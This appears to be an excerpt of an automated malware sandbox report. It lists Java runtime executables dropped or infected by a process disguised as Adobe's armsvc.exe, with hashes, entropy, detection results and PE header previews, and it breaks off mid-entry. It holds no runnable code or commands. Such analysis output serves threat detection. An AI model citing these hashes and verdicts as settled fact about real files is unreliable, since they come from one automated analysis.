File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999988914307437
Encrypted:	true
SSDEEP:	3145728:FLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICUL:lBWx/pt8U7E6aZRfIICUL
MD5:	6A93568BFDAAC6E5DADFFD9CA584C908
SHA1:	E18F477627F44BF3ED612844BA62CEF750DC51D0
SHA-256:	E632F20E923011F7BF773CFDD3C566E42B94AC2B7595237D826D2C81F4358990
SHA-512:	E3713C1993D80D7938374527F246D22A7DFE478834D37CE171072A7318DEFDC682C2D8E6CCDE8E59B6FDA327911013782D4F1A41FB05C5DDF13F9B737C21B596
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L.....j~L... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1264640
Entropy (8bit):	4.712918124068021
Encrypted:	false
SSDEEP:	12288:nGGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:nGGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	D3CA57DAE2D66DCB46B404685BAAE0FA
SHA1:	1C217E4D33C4708A117B94A08D33E2E5C698023A
SHA-256:	ED509EF78C538698D34552BFF2A17031569FEEC9CF25330881F7EE94363A7B25
SHA-512:	FE8AE14A11599A812FC88CAA28EA5304F24A3402F8758FC3CAB5B0779E1E0FF8FF16A945A69E85647C02B428B9F161A1EED87AE409A3D2FF25FC4D3E4778E700
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................V{......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...............l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.674817803747707
Encrypted:	false
SSDEEP:	12288:Z2PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:wPGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	52FACBA463CEDF66C092AAF94403740E
SHA1:	741F206C4F49AD3426963E0FF02B485A4953FCA7
SHA-256:	F6898EBC2D0CF12A3E1934EF8A54D6E0D1B172465304C9C4B45EB971B65E74EE
SHA-512:	D1E7A9041ECCC3396A67F631F5CABCFF6B963CB9DD771B6EA6DAC75CA2125AE9FB4480339A33B40E2FEAE2693FEC7F00D22008F0350CD538752C600C5847C469
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1481728
Entropy (8bit):	5.127098482332526
Encrypted:	false
SSDEEP:	24576:FpwOtO7EGJ0eeQ2yPyzc+E7xonyVGc/dT5N:FmOtmbJLeQVPyzc+E7xQ2l
MD5:	5387A7BCA447F6A72E643F6186D17D56
SHA1:	CB48388A110C5918DF11CF4E4553C6C71806C2A0
SHA-256:	1F4E6B6178C51CFB0E53545194D680B52DC426E0149564E2D20FABD14FAB9369
SHA-512:	2248D7B8A2A2C23230463A22EA9D51A98D9185149205DB8579C1A52AD700DE2A07D7E3589DEDFEC413A2E4544EA7124B363A898E2F71BBC579C51BD4408DD418
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@........................... .....Jw.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1318912
Entropy (8bit):	4.7765840457053255
Encrypted:	false
SSDEEP:	12288:BF1vvzGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:L1TGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	BB76FD4581AA6ABD0148DD3211AB6CE1
SHA1:	FBD9A96FFB4DBE278A5793CF562F511A48A4198D
SHA-256:	A1F0EC5FFC47B502A41A8DD2ED6AD6ED8A40542E0D2F5759EE25981B3446E664
SHA-512:	D9C357DA152C5D2D92E1F9BB0C58F04695B44075F8955D5FBEA258DB243EF7EEA7E4596163AEAA63FD16D8B2B9B3862EA33E5C275A7F168DD1608130A94AFB7E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..........................P......gp......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1481728
Entropy (8bit):	5.12779884956594
Encrypted:	false
SSDEEP:	24576:QKU/h/4KBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:Qr/VsJLeQVPyzc+E7xQ2l
MD5:	28DE42F9A3D44AFF22FBF253D52D2ACD
SHA1:	8D2AB101F0CF1784B35E9BA6754EA4BFCB79C87F
SHA-256:	F59E8071188DDAF213DB35C64AFE0FFF7080DE069236673AA010397838A4EAB5
SHA-512:	2712159E5459CE2CBF5D75E182E8B9BE4621D5B29F1D1BD2D051C1D4A5D05BA9E829218B7306B9F64D4D512395E436BFD58962067BDC0BF0C3D77DFA5E7DF356
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@........................... ..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1620480
Entropy (8bit):	5.1912946798597
Encrypted:	false
SSDEEP:	24576:Vx7YiBLZ05jNTmJWExgGJ0eeQ2yPyzc+E7xonyVGc/dT5N:VxUiHIjNgXJLeQVPyzc+E7xQ2l
MD5:	5FACEC067BCCB1D3E0BE10330D833CBB
SHA1:	D45631CCD801607FD4061D6B59E9EE331A481B12
SHA-256:	050C63C58F3BF7DE30F64BB5D26CA5CD2CB4317201478AB21A6DF1948B630431
SHA-512:	9AB9F50056F7A3B093F6F14C69F4B2BF3370A2AA2D4B12893B89E0E5AB79AB2F1D8C2B470F0F4B8BD215525D9E8FEF34E3077F18DF3882782CC14BDC70BE9CB5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..........................0$.....Q...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675277581389783
Encrypted:	false
SSDEEP:	12288:5orfGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:yTGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	023884942C4CA6F01B2218DE8A8B8BC3
SHA1:	181610036C415387BEB93012FE1B4CFB7FF8A4CD
SHA-256:	35542094B4FA223887422F8175E04F77743603797D7A57EB0D7DFED274BC5724
SHA-512:	3E7B315133A61C8D73180626A0B62AA50E33C936FB537DC7195EA96A271DDE28CDB2C79C632C80F1B2B1871ACC68FABD5102B4272678221FBFBB046D2EE880B2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	4.834500747196533
Encrypted:	false
SSDEEP:	24576:VdP/iGJ0eeQ2yPyzc+E7xonyVGc/dT5N:7tJLeQVPyzc+E7xQ2l
MD5:	CF51F35F0E97CA5E55E28913301A6540
SHA1:	0CC15616158E4C89AB92F7CDCFFB6DCEAF98B634
SHA-256:	AD668923CDB8E03B8F3A99ED0C5B5852E48A7BC26BA52F3425F7703078B12800
SHA-512:	B8C8BEC798E100294ED8D3750325731B8647F6025DCF1D3E5AAD1C5911D2F215EA84BF2A360D4C487CC5914251AF24F593678989288029F72DD9B683D4DC9BF2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@.................................]...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675302568121257
Encrypted:	false
SSDEEP:	12288:hZ5nGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:vhGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	84F8D0A4F78FA6A428D0D9FBC3EDA85D
SHA1:	BE8AB6916E4F54972E1A70A26D18362B97304981
SHA-256:	79C1E7DA9C3058811283A6401449D7F8A6FCAE0000309067E3B5B966D28FE134
SHA-512:	E546EB482B0C98CA1FC7DD5B65623D0F26AB319326417AF370A60204F50B6DF0F5CCC0D3F81896A8BF99421DE9E891BD95F38D98B9BBAFC86111FF482884E4D7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675364844700586
Encrypted:	false
SSDEEP:	12288:xZlPGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:jlGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	80853AA178DA642F2DCAF2C82D0730C9
SHA1:	7FA932894A154D3C1151634DAC67B344AD9D8DE2
SHA-256:	72BD431D96563CB34607B743B95B4B4CD0304234D28664E13579212BE56F9E89
SHA-512:	3CDA12E1832C3622128739030F45A4D7CD470E99214E68CDC15FC86C34F2C0509DF1E11557BF215D38D5F2FF5FE2C0C917A6478C7D1DD7D3C96750D063952D59
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.......P.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.67536745738504
Encrypted:	false
SSDEEP:	12288:6NlPGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:MlGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	B34D874AAF984FA34B4D0014ADBE0CC0
SHA1:	4D5D718117A0998D8AA77B65A49299A457AA2C90
SHA-256:	5759A624EC90A04D290A20FECA3B70F2EDC1ACF4838FBA55672F2B29EF953874
SHA-512:	5BAF6EDA83F3472912FD4B2CF6057582DA8909FE14CF595B842A7BFCDE09525EAA2AC2A8F006514F79328B4A135CB90E4B29D92F62E2BD48576080B478FDA3F1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......8........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.6753372448576735
Encrypted:	false
SSDEEP:	12288:xmmvGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:koGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	DBA43A6D86B8A48090D46C25DA313528
SHA1:	C87CCC9A62B4FFAE5B6A94582E13C0D7115A0DC5
SHA-256:	949C51779BD3BBC045E619E352B4F680532BA954BC6C94418C23FEFBAC6B4E61
SHA-512:	ABA4596BCC1D68DAD086937D98A221C26660CEC080EEBB58547E2721E9DA707C6E7CF9756DC50EB6F933A2F62A2C2AB46DCC3F7B60A2190594397FFD44BAAF14
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......M........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.676207379518071
Encrypted:	false
SSDEEP:	12288:EnmzGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:+kGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	C42422856A9ED16D33604AF04DB5D89B
SHA1:	8D4650E0BDF375713B9691B40083D43D2A47E34F
SHA-256:	E362C259AC206AB21D961D06FBF2E9FF244CAE8F799A1BA4BA332FA0D6A6B7BF
SHA-512:	BD3ADE2502D4CA66B7E94F30808550C19354FAE466440057D34553DC0AC1B9AE2903543223AE04BDCD7E81F83426CD15C386AF823C4FDE7E3A5A441C3362B092
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.............................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675320782641669
Encrypted:	false
SSDEEP:	12288:8T5nGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:Q5GJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	50FD426913A1F9067513B366B0D09F19
SHA1:	2E70E205A44FF024694F29BA8A61B45B1CAA9684
SHA-256:	D65CD55D409EA722FDE54D5EBDC87044EF427DE39E03913196A1F26B0B13FEBB
SHA-512:	C8FA7F5150B6B2F9835469112DE57E36F171ECD4F48A482EF8EEC4A6C1E09FA8E9F0BB519C8B357EE701D2DE84A934C8158CFC8A72EC2876214C4089F22F4D16
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0..............................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675357404241606
Encrypted:	false
SSDEEP:	12288:Fw/PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:WXGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	D6C3A6EEB2E4954E59C636AD8943BAFB
SHA1:	76F87E4094F5AF06D03FC0D0FD626740F7B70095
SHA-256:	BC9BADC78BC9C7DBD387BD1C34EF4B9C07529F8C738289D759346D995FEE7AF5
SHA-512:	E4D4E6664B64A26760738E30C0781145A899FBE31935CE74648C90F0BC592358E47CF46DEF2CFDA41A74C2916E01D4AFE66FBF0725740739C7725873AD64A9BE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......z........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675262319154278
Encrypted:	false
SSDEEP:	12288:7Am/GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:soGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	523D77825263E9CE7A4F8B43F6D133EA
SHA1:	86E9E45DEEEA70CC996219FD88E4B042A15D0992
SHA-256:	5912A9DCD7946AB06B77D3423553A7C6F8D32556EB1041A5A485A900B32CBC71
SHA-512:	13DEF488351C9B4CEA7DADF14C2FA44CB90B7BD8B1CB153E34C88CF71DE79297DFF5E28AD9D45B5AB5DA93BC4E2F645C8FC2BC8642075F9AC4A06BB9BC286510
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0.......u.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675306495844584
Encrypted:	false
SSDEEP:	12288:q1SHGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:QMGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	32E86268850C642A64634353A3F59AE9
SHA1:	46791C417510A8A62C79C91B45C6260D36BFF0A4
SHA-256:	C5B0BECFAC0DA0A5924DB95C13063C17569A015CAB4F6A4656F281C570B5746D
SHA-512:	8EF1FD361AC75481474CBC6B50DE934317C7B973402E87FC876D03FC81FF339F9B2CF43ACBE51DC6E4071FEA5AF0068EB0C98F68081AB8DA070EA38C1272A123
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0...............................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1248768
Entropy (8bit):	4.675358432994195
Encrypted:	false
SSDEEP:	12288:VU/PGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:aXGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	AE4B9B9A203DD82A9A44AD635A7702FD
SHA1:	110379E1F4CFE903D1CB61A5AD4F7F933A3220DA
SHA-256:	B52D7938E4B4CDFE977DE19428C2981CFCB81EF1BFDC4334E78860B4232805B3
SHA-512:	AA80E48829A9A18A15D7287F3DE4A0D1DDFD9CDCEF5329CE2727BB674FD59B89B2B8FB3049F2C8D620A2FF696C66B284A101FFDA3962BF0AFE45527FBEE47665
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................0......;;.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1309184
Entropy (8bit):	4.753518152881259
Encrypted:	false
SSDEEP:	12288:zEZGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:zEZGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	D37CFBF3358D06895EB64093F45FE50B
SHA1:	642710A307CE1A28BD4CEF2F9A8FE9FC634202D7
SHA-256:	4D489637C41625152C9F08D12A3B31190DF6EC1C28C91934AF94077B9D9FE16A
SHA-512:	3D5DAFC7EE4A1244DA8B502DF02165F4418E7CF680DDB5E81BD60B72F82047EEC44483277F9368A209F851740A374CEFBBB468D496833433E46520694928791D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@.......................... ......}u..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1249280
Entropy (8bit):	4.674891910737304
Encrypted:	false
SSDEEP:	12288:aFQDGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:MWGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	29A41ADDC39299C4243B9DD8F6790648
SHA1:	222266C473E6A187892E7D23C3271FD85FD02883
SHA-256:	42146EAC71AFB522F84B6F048D48B305CE1CD5DBD2A82B2D34DF3F911E842A19
SHA-512:	34D318DC9F7FAEDA70F8E14B09F21C67306B0EF06215233761DD6C530FAE4C982F8CE57657BD2F6AAFDD3A87E0B94BA14808A2D2F6D2957B67A4E2D214B25F2F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................0......Z[.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc.......P.......0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
